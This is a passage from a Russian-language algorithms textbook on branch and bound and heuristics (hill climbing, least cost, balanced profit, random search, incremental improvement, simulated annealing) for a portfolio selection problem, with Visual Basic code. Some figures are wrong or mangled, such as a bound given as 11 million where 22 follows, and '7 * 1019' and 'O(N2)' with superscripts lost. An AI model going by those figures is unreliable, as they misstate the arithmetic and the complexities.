Чтобы использовать метод ветвей и границ, создадим массив, который будет содержать позиции из наилучшего найденного до сих пор решения. При инициализации массив должен быть пуст. Можно также использовать переменную для отслеживания цены этого решения. Вначале эта переменная может иметь небольшое значение, чтобы первое же найденное реальное решение было лучше исходного.
При поиске в дереве решений, если в какойто точке анализируемое решение не может быть лучше, чем существующее, то можно прекратить дальнейший поиск по этому пути. Также, если в какойто точке выбранные позиции стоят более 100 миллионов, то можно также прекратить поиск.
В качестве конкретного примера, предположим, что имеются инвестиции, приведенные в табл. 8.1. На рис. 8.6 показано соответствующее дерево решений. Некоторые из этих инвестиционных пакетов нарушают граничные условия задачи. Например, самый левый путь привел бы к вложению 178 миллионов долларов во все четыре возможных инвестиции.
Предположим, что мы начали поиск в дереве, изображенном на рис. 8.6 и обнаружили, что можно потратить 97 миллионов долларов на позиции A и B, получив 23 миллиона прибыли. Это соответствует четвертому листу слева на рис. 8.6.
При продолжении поиска в дереве, можно дойти до второго слева узла B на рис. 8.6. Это соответствует инвестиционному пакету, который включает позицию A, не включает позицию B, и может включать или не включать позиции C и D. В этой точке пакет уже стоит 45 миллионов долларов за счет позиции A, и приносит 10 миллионов прибыли.
Оставшиеся позиции C и D вместе взятые могут повысить прибыль еще на 12 миллионов. Текущее решение приносит 10 миллионов прибыли, поэтому наилучшее возможное решение ниже этого узла принесет не больше 11 миллионов прибыли. Это меньше, чем доход в 23 миллиона для уже найденного решения, поэтому нет смысла продолжать поиск вниз по этому пути.
По мере продвижения программы по дереву ей не нужно постоянно проверять, будет ли частичное решение, которое она рассматривает, лучше, чем наилучшее найденное до сих пор решение. Если частичное решение лучше, то лучше будет и самый правый узел внизу от этого частичного решения. Этот узел представляет тот же самый набор позиций, как и частичное решение, так как все остальные позиции при этом исключены. Это означает, что программе необходимо искать лучшее решение только тогда, когда она достигает листа.
@Таблица 8.1. Возможные инвестиции
======197
Фактически, любой лист, до которого доходит программа всегда является более хорошим решением. Если бы это было не так, то ветвь, на котором находится этот лист, была бы отсечена, когда программа рассматривала родительский узел. В этой точке перемещение к листу уменьшит цену невыбранных позиций до нуля. Если цена решения не больше, чем наилучшее найденное до сих пор решение, то проверка нижней границы остановит продвижение программы к листу. Используя этот факт, программа может обновлять наилучшее решение при достижении листа.
Следующий код использует проверку верхней и нижней границы для реализации алгоритма ветвей и границ:
' Полная нераспределенная прибыль.
Private unassigned_profit As Integer
Public NumItems As Integer
Public MaxItem As Integer
Global Const OPTION_EXHAUSTIVE_SEARCH = 0
Global Const OPTION_BRANCH_AND_BOUND = 1
Type Item
Cost As Integer
Profit As Integer
End Type
Global Items() As Item
Global NodesVisited As Long
Global ToSpend As Integer
Global best_cost As Integer
Global best_profit As Integer
' Равно True для позиций в текущем наилучшем решении.
Public best_solution() As Boolean
' Решение, которое мы проверяем.
Private test_solution() As Boolean
Private test_cost As Integer
Private test_profit As Integer
' Инициализация переменных и начало поиска.
Public Sub Search(search_type As Integer)
Dim i As Integer
' Задание размера массивов решения.
ReDim best_solution(0 To MaxItem)
ReDim test_solution(0 To MaxItem)
' Инициализация - пустой список инвестиций.
NodesVisited = 0
best_profit = 0
best_cost = 0
unassigned_profit = 0
For i = 0 To MaxItem
unassigned_profit = unassigned_profit + Items(i).Profit
Next i
test_profit = 0
test_cost = 0
' Начнем поиск с первой позиции.
BranchAndBound 0
End Sub
' Выполнить поиск методом ветвей и границ начиная с этой позиции.
Public Sub BranchAndBound(item_num As Integer)
Dim i As Integer
NodesVisited = NodesVisited + 1
' Если это лист, то это лучшее решение, чем
' то, которое мы имели раньше, иначе он был бы
' отсечен во время поиска раньше.
If item_num > MaxItem Then
For i = 0 To MaxItem
best_solution(i) = test_solution(i)
best_profit = test_profit
best_cost = test_cost
Next i
Exit Sub
End If
' Иначе перейти по ветви вниз по ветвям потомка.
' Вначале попытаться добавить эту позицию. Убедиться,
' что она не превышает ограничение по цене.
If test_cost + Items(item_num).Cost <= ToSpend Then
' Добавить позицию к тестовому решению.
test_solution(item_num) = True
test_cost = test_cost + Items(item_num).Cost
test_profit = test_profit + Items(item_num).Profit
unassigned_profit = unassigned_profit - Items(item_num).Profit
' Рекурсивная проверка возможного результата.
BranchAndBound item_num + 1
' Удалить позицию из тестового решения.
test_solution(item_num) = False
test_cost = test_cost - Items(item_num).Cost
test_profit = test_profit - Items(item_num).Profit
unassigned_profit = unassigned_profit + Items(item_num).Profit
End If
' Попытаться исключить позицию. Выяснить, принесут ли
' оставшиеся позиции достаточный доход, чтобы
' путь вниз по этой ветви превысил нижний предел.
unassigned_profit = unassigned_profit - Items(item_num).Profit
If test_profit + unassigned_profit > best_profit Then BranchAndBound item_num + 1
unassigned_profit = unassigned_profit + Items(item_num).Profit
End Sub
Программа BandB использует метод полного перебора и метод ветвей и границ для решения задачи о формировании портфеля. Введите максимальную и минимальную стоимость и цену, которые вы хотите присвоить позициям, а также число позиций, которое требуется создать. Затем нажмите на кнопку Randomize (Рандомизировать), чтобы создать список позиций.
Затем при помощи переключателя внизу формы выберите либо Exhaustive Search (Полный перебор), либо Branch and Bound (Метод ветвей и границ). Когда вы нажмете на кнопку Go (Начать), то программа найдет наилучшее решение при помощи выбранного метода. Затем она выведет на экран это решение, а также число узлов в полном дереве решений и число узлов, которые программа в действительности проверила. На рис. 8.7 показано окно программы BindB после решения задачи портфеля для 20 позиций. Перед тем, как выполнить полный перебор для 20 позиций, попробуйте вначале запустить примеры меньшего размера. На компьютере с процессором Pentium с тактовой частотой 90 МГц поиск решения задачи портфеля для 20 позиций методом полного перебора занял более 30 секунд.
При поиске методом ветвей и границ число проверяемых узлов намного меньше, чем при полном переборе. Дерево решений для задачи портфеля с 20 позициями содержит 2.097.151 узел. При полном переборе придется проверить их все, при поиске методом ветвей и границ понадобится проверить только примерно 1.500 из них.
@Рис. 8.7. Программа BindB
======200
Число узлов, которые проверяет программа при использовании метода ветвей и границ, зависит от точных значений данных. Если цена позиций высока, то в правильное решение будет входить немного элементов. После помещения нескольких позиций в пробное решение, оставшиеся позиции слишком дорого стоят, чтобы поместиться в портфеле, потому большая часть дерева будет отсечена.
С другой стороны, если элементы имеют низкую стоимость, то в правильное решение войдет большое их число, поэтому программе придется исследовать множество комбинаций. В табл. 8.2 приведено число узлов, проверенное программой BindB в серии тестов при различной стоимости позиций. Программа создавала 20 случайных позиций, и полная стоимость решения была равна 100.
Эвристики
Иногда даже алгоритм ветвей и границ не может провести полный поиск в дереве. Дерево решений для задачи портфеля с 65 позициями содержит более 7 * 1019 узлов. Если алгоритм ветвей и границ проверяет только одну десятую процента этих узлов, и если компьютер проверяет миллион узлов в секунду, то для решения этой задачи потребовалось бы более 2 миллионов лет. В задачах, для которых алгоритм ветвей и границ выполняется слишком медленно, можно использовать эвристический подход.
Если качество решения не так важно, то приемлемым может быть результат, полученный при помощи эвристики. В некоторых случаях точность входных данных может быть недостаточной. Тогда хорошее эвристическое решение может быть таким же правильным, как и теоретически «наилучшее» решение.
В предыдущем примере метод ветвей и границ использовался для выбора инвестиционных возможностей. Тем не менее, вложения могут быть рискованными, и точные результаты часто заранее неизвестны. Может быть, что заранее будет неизвестен точный доход или даже стоимость некоторых инвестиций. В этом случае, эффективное эвристическое решение может быть таким же надежным, как и наилучшее решение, которое вы может вычислить точно.
@Таблица 8.2. Число узлов, проверенных при поиске методами полного перебора и ветвей и границ
=======201
В этом разделе обсуждаются эвристики, которые полезны при решении многих сложных задач. Программа Heur демонстрирует каждую из эвристик. Она также позволяет сравнить результаты, полученные при помощи эвристик и методов полного перебора и ветвей и границ. Введите значения минимальной и максимальной стоимости и дохода, а также число позиций и полную стоимость портфеля в соответствующих полях области Parameters (Параметры), чтобы задать параметры создаваемых данных. Затем выберите алгоритмы, которые вы хотите протестировать, и нажмите на кнопку Go. Программа выведет полную стоимость и доход для наилучшего решения, найденного при помощи каждого из алгоритмов. Она также сортирует решения по максимальному полученному доходу и выводит время выполнения для каждого из алгоритмов. Используйте метод ветвей и границ только для небольших задач, а метод полного перебора только для задач еще меньшего объема.
На рис. 8.8 показано окно программы Heur после решения задачи формирования портфеля для 20 позиций. Эвристики Fixed1, Fixed2 и No Changes 1, которые будут вскоре описаны, дали наилучшие эвристические решения. Заметьте, что эти решения немного хуже, чем точные решения, которые получены при использовании метода ветвей и границ.
Восхождение на холм
Эвристика восхождения на холм (hillclimbing) вносит изменения в текущее решение, чтобы максимально приблизить его к цели. Этот процесс называется восхождением на холм, так как он похож на то, как заблудившийся путешественник пытается ночью добраться до вершины горы. Даже если уже слишком темно, чтобы еще можно было разглядеть чтото вдали, путешественник может попытаться добраться до вершины горы, постоянно двигаясь вверх.
Конечно, существует вероятность, что путешественник застрянет на вершине меньшего холма и не доберется до пика. Эта проблема всегда может возникать при использовании этой эвристики. Алгоритм может найти решение, которое может оказаться локально приемлемым, но это не обязательно наилучшее возможное решение.
В задаче о формировании портфеля, цель заключается в том, чтобы подобрать набор позиций, полная стоимость которых не превышает заданного предела, а общая цена максимальна. На каждом шаге эвристика восхождения на холм будет выбирать позицию, которая приносит наибольшую прибыль. При этом решение будет все лучше соответствовать цели — получению максимальной прибыли.
@Рис. 8.8. Программа Heur
========202
Вначале программа добавляет к решению позицию с максимальной прибылью. Затем она добавляет следующую позицию с максимальной прибылью, если при этом полная цена еще остается в допустимых пределах. Она продолжает добавлять позиции с максимальной прибылью до тех пор, пока не останется позиций, удовлетворяющих условиям.
Для списка инвестиций из табл. 8.3, программа вначале выбирает позицию A, так как она дает максимальную прибыль — 9 миллионов долларов. Затем программа выбирает следующую позицию C, которая дает прибыль 8 миллионов. В этот момент потрачены уже 93 миллиона из 100, и программа не может приобрести больше позиций. Решение, полученное при помощи эвристики, включает позиции A и C, имеет стоимость 93 миллиона, и приносит 17 миллионов прибыли.
@Таблица 8.3. Возможные инвестиции
Эвристика восхождения на холм заполняет портфель очень быстро. Если позиции изначально были отсортированы в порядке убывания приносимой прибыли, то сложность этого алгоритма порядка O(N). Программа просто перемещается по списку, добавляя каждую позицию, если под нее есть место. Даже если список не упорядочен, то это алгоритм со сложностью порядка O(N2). Это намного лучше, чем O(2N) шагов, которые требуются для полного перебора всех узлов в дереве. Для 20 позиций эта эвристика требует всего около 400 шагов, метод ветвей и границ — несколько тысяч, а полный перебор — более чем 2 миллиона.
Public Sub HillClimbing()
Dim i As Integer
Dim j As Integer
Dim big_value As Integer
Dim big_j As Integer
' Многократный обход списка и поиск следующей
' позиции, приносящей наибольшую прибыль,
' стоимость которой не превышает верхней границы.
For i = 1 To NumItems
big_value = 0
big_j = -1
For j = 1 To NumItems
' Проверить, не находится ли он уже
' в решении.
If (Not test_solution(j)) And _
(test_cost + Items(j).Cost <= ToSpend) And _
(big_value < Items(j).Profit)
Then
big_value = Items(j).Profit
big_j = j
End If
Next j
' Остановиться, если не найдена позиция,
' удовлетворяющая условиям.
If big_j < 0 Then Exit For
test_cost = test_cost + Items(big_j).Cost
test_solution(big_j) = True
test_profit = test_profit + Items(big_j).Profit
Next i
End Sub
Метод наименьшей стоимости
Стратегия, которая в какомто смысле противоположна стратегии восхождения на холм, называется стратегией наименьшей стоимости (leastcost). Вместо того чтобы на каждом шаге пытаться максимально приблизить решение к цели, можно попытаться уменьшить стоимость решения, насколько это возможно. В примере с формированием портфеля, на каждом шаге к решению добавляется позиция с минимальной стоимостью.
Эта стратегия пытается поместить в решение максимально возможное число позиций. Это будет неплохим решением, если все позиции имеют примерно одинаковую стоимость. Если дорогая позиция приносит большую прибыль, то эта стратегия может упустить эту возможность, давая не лучший из возможных результатов.
Для инвестиций, показанных в табл. 8.3, алгоритм наименьшей стоимости начинает с добавления к решению позиции E со стоимостью 23 миллиона долларов. Затем он выбирает позицию D, стоящую 27 миллионов, и затем позицию C со стоимостью 30 миллионов. В этой точке алгоритм уже потратил 80 миллионов из 100 возможных, поэтому больше он не может выбрать ни одной позиции.
Это решение имеет стоимость 80 миллионов и дает 18 миллионов прибыли. Это на миллион лучше, чем решение для эвристики восхождения на холм, но стратегия наименьшей стоимости не всегда дает лучшее решение, чем восхождение на холм. Какая из эвристик дает лучшие результаты, зависит от значений входных данных.
Структура программы, реализующей эвристику наименьшей стоимости, почти идентична структуре программы для эвристики восхождения на холм. Единственное различие между ними заключается в выборе следующей позиции для добавления к решению. Эвристика наименьшей стоимости выбирает позицию с минимальной ценой; метод восхождения на холм выбирает позицию с максимальной прибылью. Так как эти два метода очень похожи, они выполняются за одинаковое время. Если позиции упорядочены соответствующим образом, то оба алгоритма выполняются за время порядка O(N). Если позиции расположены случайным образом, то оба выполняются за время порядка O(N2).
========203-204
Так как код на языке Visual Basic для этих двух эвристик очень похож, то мы приводим только строки, в которых происходит выбор очередной позиции.
If (Not test_solution(j)) And _
(test_cost + Items(j).Cost <= ToSpend) And _
(small_cost > Items(j).Cost)
Then
small_cost = Items(j).Cost
small_j = j
End If
Сбалансированная прибыль
Стратегия восхождения на холм не учитывает стоимость добавляемых позиций. Она выбирает позиции с максимальной прибылью, даже если их стоимость велика. Стратегия наименьшей стоимости не учитывает приносимую позицией прибыль. Она выбирает позиции с низкой стоимостью, даже если они приносят мало прибыли.
Эвристика сбалансированной прибыли (balanced profit) сравнивает при выборе стоимость позиций и приносимую ими прибыль. На каждом шаге эвристика выбирает позицию с наибольшим отношением прибыльстоимость.
В табл. 8.4 приведены те же данные, что и в табл. 8.3, но в ней добавлена еще одна колонка с отношением прибыльстоимость. При этом подходе вначале выбирается позиция C, так как она имеет максимальное соотношение прибыльстоимость — 0,27. Затем к решению добавляется позиция D с отношением 0,26, и позиция B с отношением 0,20. В этой точке, будет потрачено 92 миллиона из 100 возможных, и в решение нельзя будет добавить больше ни одной позиции.
Решение будет иметь стоимость 92 миллиона и давать 22 миллиона прибыли. Это на 4 миллиона лучше, чем решение с наименьшей стоимостью и на 5 миллионов лучше, чем решение методом восхождения на холм. В этом случае, это будет также наилучшим возможным решением, и его также можно найти полным перебором или методом ветвей и границ. Метод сбалансированной прибыли тем не менее, является эвристическим, поэтому он не обязательно находит наилучшее возможное решение. Он часто находит лучшее решение, чем методы наименьшей стоимости и восхождения на холм, но это не обязательно так.
@Таблица 8.4. Возможные инвестиции с соотношением прибыльстоимость
=========205
Структура программы, реализующей эвристику сбалансированной прибыли, почти идентична структуре программ для восхождения на холм и наименьшей стоимости. Единственное отличие заключается в методе выбора следующей позиции, которая добавляется к решению:
If (Not test_solution(j)) And _
(test_cost + Items(j).Cost <= ToSpend) And _
(good_ratio < Items(j).Profit / CDbl(Items(j).Cost)) _
Then
good_ratio = Items(j).Profit / CDbl(Items(j).Cost)
good_j = j
End If
Случайный поиск
Случайный поиск (random search) выполняется в соответствии со своим названием. На каждом шаге алгоритм добавляет случайную позицию, которая удовлетворяет верхнему ограничению на суммарную стоимость позиций в портфеле. Этот метод поиска также называется методом МонтеКарло (Monte Carlo search или Monte Carlo simulation).
Так как маловероятно, что случайно выбранное решение окажется наилучшим, необходимо многократно повторять этот поиск, чтобы получить приемлемый результат. Хотя может показаться, что вероятность нахождения хорошего решения при этом мала, этот метод иногда дает удивительно хорошие результаты. В зависимости от значений данных и числа проверенных случайных решений результат, полученный при помощи этой эвристики, часто оказывается лучше, чем в случае применения методов восхождения на холм или наименьшей стоимости.
Преимущество случайного поиска состоит также и в том, что этот метод легок в понимании и реализации. Иногда сложно представить, как реализовать решение задачи при помощи эвристик восхождения на холм, наименьшей стоимости, или сбалансированного дохода, но всегда просто выбирать решения случайным образом. Даже для очень сложных проблем, случайный поиск является простым эвристическим методом.
Подпрограмма RandomSearch в программе Heur использует функцию AddToSolution для добавления к решению случайной позиции. Эта функция возвращает значение True, если она не может найти позицию, которая удовлетворяет условиям, и False в другом случае. Подпрограмма RandomSearch вызывает функцию AddToSolution до тех пор, пока больше нельзя добавить ни одной позиции.
Public Sub RandomSearch()
Dim num_trials As Integer
Dim trial As Integer
Dim i As Integer
' Сделать несколько попыток и выбрать наилучший результат.
num_trials = NumItems ' Использовать N попыток.
For trial = 1 To num_trials
' Случайный выбор позиций, пока это возможно.
Do While AddToSolution()
' Всю работу выполняет функция AddToSolution.
Loop
' Определить, лучше ли это решение, чем предыдущее.
If test_profit > best_profit Then
best_profit = test_profit
best_cost = test_cost
For i = 1 To NumItems
best_solution(i) = test_solution(i)
Next i
End If
' Сбросить пробное решение и сделать еще одну попытку.
test_profit = 0
test_cost = 0
For i = 1 To NumItems
test_solution(i) = False
Next i
Next trial
End Sub
Private Function AddToSolution() As Boolean
Dim num_left As Integer
Dim j As Integer
Dim selection As Integer
' Определить, сколько осталось позиций, которые
' удовлетворяют ограничению максимальной стоимости.
num_left = 0
For j = 1 To NumItems
If (Not test_solution(j)) And _
(test_cost + Items(j).Cost <= ToSpend) _
Then num_left = num_left + 1
Next j
' Остановиться, если нельзя найти новую позицию.
If num_left < 1 Then
AddToSolution = False
Exit Function
End If
' Выбрать случайную позицию.
selection = Int((num_left) * Rnd + 1)
' Найти случайно выбранную позицию.
For j = 1 To NumItems
If (Not test_solution(j)) And _
(test_cost + Items(j).Cost <= ToSpend) _
Then
selection = selection - 1
If selection < 1 Then Exit For
End If
Next j
test_profit = test_profit + Items(j).Profit
test_cost = test_cost + Items(j).Cost
test_solution(j) = True
AddToSolution = True
End Function
Последовательное приближение
Еще одна стратегия заключается в том, чтобы начать со случайного решения и затем делать последовательные приближения (incremental improvements). Начав со случайно выбранного решения, программа делает случайный выбор. Если новое решение лучше предыдущего, программа закрепляет изменения и продолжает проверку других случайных изменений. Если изменение не улучшает решение, программа отбрасывает его и делает новую попытку.
Для задачи формирования портфеля особенно просто порождать случайные изменения. Программа просто выбирает случайную позицию из пробного решения, и удаляет ее из текущего решения. Она затем снова добавляет случайные позиции в решение до тех пор, пока они помещаются. Если удаленная позиция имела очень высокую стоимость, то на ее место программа может поместить несколько позиций.
Момент остановки
Есть несколько хороших способов определить момент, когда следует прекратить случайные изменения. Для проблемы с N позициями, можно выполнить N или N2 случайных изменений, перед тем, как остановиться.
=====206-208
В программе Heur этот подход реализован в процедуре MakeChangesFixed. Она выполняет определенное число случайных изменений с рядом случайных пробных решений:
Public Sub MakeChangesFixed(K As Integer, num_trials As Integer, num_changes As Integer)
Dim trial As Integer
Dim change As Integer
Dim i As Integer
Dim removal As Integer
For trial = 1 To num_trials
' Найти случайное пробное решение и использовать его
' в качестве начальной точки.
Do While AddToSolution()
' All the work is done by AddToSolution.
Loop
' Начать с этого пробного решения.
trial_profit = test_profit
trial_cost = test_cost
For i = 1 To NumItems
trial_solution(i) = test_solution(i)
Next i
For change = 1 To num_changes
' Удалить K случайных позиций.
For removal = 1 To K
RemoveFromSolution
Next removal
' Добавить максимально возможное
' число позиций.
Do While AddToSolution()
' All the work is done by AddToSolution.
Loop
' Если это улучшает пробное решение, сохранить его.
' Иначе вернуть прежнее значение пробного решения.
If test_profit > trial_profit Then
' Сохранить изменения.
trial_profit = test_profit
trial_cost = test_cost
For i = 1 To NumItems
trial_solution(i) = test_solution(i)
Next i
Else
' Сбросить пробное решение.
test_profit = trial_profit
test_cost = trial_cost
For i = 1 To NumItems
test_solution(i) = trial_solution(i)
Next i
End If
Next change
' Если пробное решение лучше предыдущего
' наилучшего решения, сохранить его.
If trial_profit > best_profit Then
best_profit = trial_profit
best_cost = trial_cost
For i = 1 To NumItems
best_solution(i) = trial_solution(i)
Next i
End If
' Сбросить пробное решение для
' следующей попытки.
test_profit = 0
test_cost = 0
For i = 1 To NumItems
test_solution(i) = False
Next i
Next trial
End Sub
Private Sub RemoveFromSolution()
Dim num_in_solution As Integer
Dim j As Integer
Dim selection As Integer
' Определить число позиций в решении.
num_in_solution = 0
For j = 1 To NumItems
If test_solution(j) Then num_in_solution = num_in_solution + 1
Next j
If num_in_solution < 1 Then Exit Sub
' Выбрать случайную позицию.
selection = Int((num_in_solution) * Rnd + 1)
' Найти случайно выбранную позицию.
For j = 1 To NumItems
If test_solution(j) Then
selection = selection - 1
If selection < 1 Then Exit For
End If
Next j
' Удалить позицию из решения.
test_profit = test_profit - Items(j).Profit
test_cost = test_cost - Items(j).Cost
test_solution(j) = False
End Sub
======209-210
Другая стратегия заключается в том, чтобы вносить изменения до тех пор, пока несколько последовательных изменений не приносят улучшений. Для задачи с N позициями, программа может вносить изменения до тех пор, пока в течение N изменений подряд улучшений не будет.
Эта стратегия реализована в подпрограмме MakeChangesNoChange программы Heur. Она повторяет попытки до тех пор, пока определенное число последовательных попыток не даст никаких улучшений. Для каждой попытки она вносит случайные изменения в пробное решение до тех пор, пока после определенного числа изменений не наступит никаких улучшений.
Public Sub MakeChangesNoChange(K As Integer, _
max_bad_trials As Integer, max_non_changes As Integer)
Dim i As Integer
Dim removal As Integer
Dim bad_trials As Integer ' Неэффективных попыток подряд.
Dim non_changes As Integer ' Неэффективных изменений подряд.
' Повторять попытки, пока не встретится max_bad_trials
' попыток подряд без улучшений.
bad_trials = 0
Do
' Выбрать случайное пробное решение для
' использования в качестве начальной точки.
Do While AddToSolution()
' All the work is done by AddToSolution.
Loop
' Начать с этого пробного решения.
trial_profit = test_profit
trial_cost = test_cost
For i = 1 To NumItems
trial_solution(i) = test_solution(i)
Next i
' Повторять, пока max_non_changes изменений
' подряд не даст улучшений.
non_changes = 0
Do While non_changes < max_non_changes
' Удалить K случайных позиций.
For removal = 1 To K
RemoveFromSolution
Next removal
' Вернуть максимально возможное число позиций.
Do While AddToSolution()
' All the work is done by
' AddToSolution.
Loop
' Если это улучшает пробное значение, сохранить его.
' Иначе вернуть прежнее значение пробного решения.
If test_profit > trial_profit Then
' Сохранить улучшение.
trial_profit = test_profit
trial_cost = test_cost
For i = 1 To NumItems
trial_solution(i) = test_solution(i)
Next i
non_changes = 0 ' This was a good change.
Else
' Reset the trial.
test_profit = trial_profit
test_cost = trial_cost
For i = 1 To NumItems
test_solution(i) = trial_solution(i)
Next i
non_changes = non_changes + 1 ' Плохое изменение.
End If
Loop ' Продолжить проверку случайных изменений.
' Если эта попытка лучше, чем предыдущее наилучшее
' решение, сохранить его.
If trial_profit > best_profit Then
best_profit = trial_profit
best_cost = trial_cost
For i = 1 To NumItems
best_solution(i) = trial_solution(i)
Next i
bad_trials = 0 ' Хорошая попытка.
Else
bad_trials = bad_trials + 1 ' Плохая попытка.
End If
' Сбросить тестовое решение для следующей попытки.
test_profit = 0
test_cost = 0
For i = 1 To NumItems
test_solution(i) = False
Next i
Loop While bad_trials < max_bad_trials
End Sub
Локальные оптимумы
Если программа заменяет случайно выбранную позицию в пробном решении, то может встретиться решение, которое она не может улучшить, но которое при этом не будет наилучшим из возможных решений. Например, рассмотрим список инвестиций, приведенный в табл. 8.5.
Предположим, что алгоритм случайно выбрал позиции A и B в качестве начального решения. Его стоимость будет равно 90 миллионам долларов, и оно принесет 17 миллионов прибыли.
Если программа удалит позиции A и B, то стоимость решения будет все еще настолько велика, что программа сможет добавить всего лишь одну позицию к решению. Так как наибольшую прибыль приносят позиции A и B, то замена их другими позициями уменьшит суммарную прибыль. Случайное удаление одной позиции из этого решения никогда не приведет к улучшению решения.
Наилучшее решение содержит позиции C, D и E. Его полная стоимость равно 98 миллионам долларов и суммарная прибыль составляет 18 миллионов долларов. Чтобы найти это решение, алгоритму бы понадобилось удалить из решения сразу обе позиции A и B и затем добавить на их место новые позиции.
Решения такого типа, для которых небольшие изменения решения не могут улучшить его, называются локальным оптимумом (local optimum). Можно использовать два способа для того, чтобы программа не застревала в локальном оптимуме, и могла найти глобальный оптимум (global optimum).
@Таблица 8.5. Возможные инвестиции
=============213
Вопервых, можно изменить программу так, чтобы она удаляла более одной позиции во время случайных изменений. В этом примере, программа могла бы найти правильное решение, если бы она одновременно удаляла бы по две случайно выбранных позиции. Тем не менее, для задач большего размера, удаления двух позиций может быть недостаточно. Программе может понадобиться удалять три, четыре, или больше позиций.
Второй, более простой способ заключается в том, чтобы делать больше попыток, начиная с разных начальных решений. Некоторые из начальных решений будут приводить к локальным оптимумам, но одно из них позволит достичь глобального оптимума.
Программа Heur демонстрирует три стратегии последовательных приближений. При выборе метода Fixed 1 (Фиксированный 1) делается N попыток. Во время каждой попытки выбирается случайно решение, которое программа затем пытается улучшить за 2 * N попыток, случайно удаляя по одной позиции.
При выборе эвристики Fixed 2 (Фиксированный 2)делается всего одна попытка. При этом программа выбирает случайное решение и пытается улучшить его, случайным образом удаляя по одной позиции до тех пор, пока в течение N последовательных изменений не будет никаких улучшений.
При выборе эвристики No Changes 1 (Без изменений 1) программа выполняет попытки до тех пор, пока после N последовательных попыток не будет никаких улучшений. Во время каждой попытки программа выбирает случайное решение и затем пытается улучшить его, случайным образом удаляя по одной позиции до тех пор, пока в течение N последовательных изменений не будет никаких улучшений.
При выборе эвристики No Changes 2 (Без изменений 2)делается одна попытка. При этом программа выбирает случайное решение и пытается улучшить его, случайным образом удаляя по две позиции до тех пор, пока в течение N последовательных изменений не будет никаких улучшений.
Названия эвристик и их описания приведены в табл. 8.6.
Алгоритм «отжига»
Метод отжига (simulated annealing) ведет свое начало из термодинамики. При отжиге металла он нагревается до высокой температуры. Молекулы в нагретом металле совершают быстрые колебания, а при медленном остывании они начинают располагаться упорядоченно, образуя кристаллы. При этом молекулы постепенно переходят в состояние с минимальной энергией.
@Таблица 8.6. Стратегии последовательных приближений
===========214
При медленном остывании металла, соседние кристаллы сливаются друг с другом. Молекулы в одном из кристаллов покидают состояние с минимальной энергией и принимают порядок молекул в другом кристалле. Энергия получившегося кристалла большего размера будет меньше, чем сумма энергий двух исходных кристаллов. Если охлаждение происходит достаточно медленно, то кристаллы становятся очень большими. Окончательное распределение молекул представляет состояние с очень низкой энергией, и металл при этом будет очень твердым.
Начиная с состояния с высокой энергией, молекулы в конце концов достигают состояния с очень низкой энергией. На пути к конечному положению, они проходят множество локальных минимумов энергии. Каждое сочетание кристаллов образует локальный минимум. Кристаллы могут объединяться друг с другом только за счет временного повышения энергии системы, чтобы затем перейти к состоянию с меньшей энергией.
Метод отжига использует аналогичный подход для поиска наилучшего решения задачи. Во время поиска решения программой, она может застрять в локальном оптимуме. Чтобы избежать этого, программа время от времени вносит в решение случайные изменения, даже если очередное изменение и не приводит к мгновенному улучшению результата. Это может помочь программе выйти из локального оптимума и отыскать лучшее решение. Если это изменение не ведет к лучшему решению, то вероятно, через некоторое время программа его отбросит.
Чтобы эти изменения не возникали постоянно, алгоритм изменяет вероятность возникновения случайных изменений со временем. Вероятность P возникновения одного из подобных изменений определяется формулой P = 1 / Exp(E / (k * T)), где E — увеличение «энергии» системы, k — некоторая постоянная, и T — переменная, соответствующая «температуре».
Вначале температура должна быть высокой, поэтому и вероятность изменений P = 1 / Exp(E / (k * T)) также достаточно велика. Иначе случайные изменения могли бы никогда не возникнуть. С течением времени значение переменной T постепенно снижается, и вероятность случайных изменений также уменьшается. После того, как модель дойдет до точки, в которой она никакие изменения не смогут улучшить решение, и температура T станет достаточно низкой, чтобы вероятность случайных изменений была мала, алгоритм заканчивает работу.
Для задачи о формирования портфеля, в качестве прибавки «энергии» E выступает уменьшение прибыли решения. Например, при удалении позиции, которая дает прибыль 10 миллионов, и замене ее на позицию, которая приносит 7 миллионов прибыли, энергия, добавленная к системе, будет равна 3.
Заметьте, что если энергия велика, то вероятность изменений P = 1 / Exp(E / (k * T)) мала, поэтому вероятность больших изменений ниже.
Алгоритм отжига в программе Heur устанавливает значение постоянной k равным разнице между наибольшей и наименьшей прибылью возможных инвестиций. Начальная температура T задается равной 0,75. После выполнения определенного числа случайных изменений, температура T уменьшается умножением на постоянную 0,95.
=========215
Public Sub AnnealTrial(K As Integer, max_non_changes As Integer, _
max_back_slips As Integer)
Const TFACTOR = 0.95
Dim i As Integer
Dim non_changes As Integer
Dim t As Double
Dim max_profit As Integer
Dim min_profit As Integer
Dim doit As Boolean
Dim back_slips As Integer
' Найти позицию с минимальной и максимальной прибылью.
max_profit = Items(1).Profit
min_profit = max_profit
For i = 2 To NumItems
If max_profit < Items(i).Profit Then max_profit = Items(i).Profit
If min_profit > Items(i).Profit Then min_profit = Items(i).Profit
Next i
t = 0.75 * (max_profit - min_profit)
back_slips = 0
' Выбрать случайное пробное решение
' в качестве начальной точки.
Do While AddToSolution()
' Вся работа выполняется в процедуре AddToSolution.
Loop
' Использовать в качестве пробного решения.
best_profit = test_profit
best_cost = test_cost
For i = 1 To NumItems
best_solution(i) = test_solution(i)
Next i
' Повторять, пока в течение max_non_changes изменений
' подряд не будет улучшений.
non_changes = 0
Do While non_changes < max_non_changes
' Удалить случайную позицию.
For i = 1 To K
RemoveFromSolution
Next i
' Добавить максимально возможное число позиций.
Do While AddToSolution()
' Вся работа выполняется в процедуре AddToSolution.
Loop
' Если изменение улучшает пробное решение, сохранить его.
' Иначе вернуть прежнее значение решения.
If test_profit > best_profit Then
doit = True
ElseIf test_profit < best_profit Then
doit = (Rnd < Exp((test_profit - best_profit) / t))
back_slips = back_slips + 1
If back_slips > max_back_slips Then
back_slips = 0
t = t * TFACTOR
End If
Else
doit = False
End If
If doit Then
' Сохранить улучшение.
best_profit = test_profit
best_cost = test_cost
For i = 1 To NumItems
best_solution(i) = test_solution(i)
Next i
non_changes = 0 ' Хорошее изменение.
Else
' Reset the trial.
test_profit = best_profit
test_cost = best_cost
For i = 1 To NumItems
test_solution(i) = best_solution(i)
Next i
non_changes = non_changes + 1 ' Плохое изменение.
End If
Loop ' Продолжить проверку случайных изменений.
End Sub
Сравнение эвристик
Различные эвристики поразному ведут себя в различных задачах. Для задачи о формировании портфеля, эвристика сбалансированной прибыли работает достаточно хорошо, учитывая ее простоту. Стратегии последовательного приближения обычно дают сравнимые результаты, но для больших задач их выполнение занимает намного больше времени. Для других задач наилучшей может быть какаялибо другая эвристика, в том числе из тех, которые не обсуждались в этой главе.
========216-217
